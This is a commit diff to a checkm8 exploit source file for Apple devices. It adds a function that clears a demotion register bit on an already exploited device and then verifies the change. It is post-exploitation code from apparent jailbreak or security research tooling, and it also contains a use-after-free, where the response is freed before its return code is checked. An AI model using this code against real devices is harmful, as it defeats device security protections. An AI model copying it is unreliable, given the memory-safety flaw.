Added demotion capability

c8_remote/src/exploit.c

@@ -1,12 +1,13 @@
 #include "checkm8.h"
+
 #include <stdlib.h>
-
-#include "usb_helpers.h"
-
 #include <stdio.h>
 #include <string.h>
 #include <unistd.h>
 
+#include "usb_helpers.h"
+#include "command.h"
+
 static unsigned char data_0xA_0xC0_buf[192] =
         {
                 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA,
@@ -289,6 +290,63 @@ struct pwned_device *exploit_device()
     }
 }
 
+int demote_device(struct pwned_device *dev)
+{
+    checkm8_debug_indent("demote_device(dev = %p)\n", dev);
+    unsigned int oldval, newval;
+
+    struct dev_cmd_resp *resp = dev_read_memory(dev, DEMOTE_REG, 4);
+    if(IS_CHECKM8_FAIL(resp->ret))
+    {
+        free_dev_cmd_resp(resp);
+        checkm8_debug_block("\tfailed to read demotion reg\n");
+        return CHECKM8_FAIL_INVARGS;
+    }
+
+    oldval = *((unsigned int *) resp->data);
+    free_dev_cmd_resp(resp);
+    if(oldval & 1u)
+    {
+        oldval &= 0xFFFFFFFE;
+
+        checkm8_debug_indent("\tattempting to demote device\n");
+        resp = dev_write_memory(dev, DEMOTE_REG, (unsigned char *) &oldval, 4);
+        free_dev_cmd_resp(resp);
+        if(IS_CHECKM8_FAIL(resp->ret))
+        {
+            checkm8_debug_block("\tfailed to write to demotion reg\n");
+            return CHECKM8_FAIL_INVARGS;
+        }
+
+        // verify
+        resp = dev_read_memory(dev, DEMOTE_REG, 4);
+        if(IS_CHECKM8_FAIL(resp->ret))
+        {
+            free_dev_cmd_resp(resp);
+            checkm8_debug_block("\tfailed to verify demotion reg\n");
+            return CHECKM8_FAIL_INVARGS;
+        }
+
+        newval = *((unsigned int *) resp->data);
+        free_dev_cmd_resp(resp);
+        if(oldval == newval)
+        {
+            checkm8_debug_block("\tdemotion success!\n");
+            return CHECKM8_SUCCESS;
+        }
+        else
+        {
+            checkm8_debug_block("\tdemotion register did not change!\n");
+            return CHECKM8_FAIL_INVARGS;
+        }
+    }
+    else
+    {
+        checkm8_debug_block("\tdevice already demoted\n");
+        return CHECKM8_SUCCESS;
+    }
+}
+
 void free_device(struct pwned_device *dev)
 {
     checkm8_debug_indent("free_device(dev = %p)\n", dev);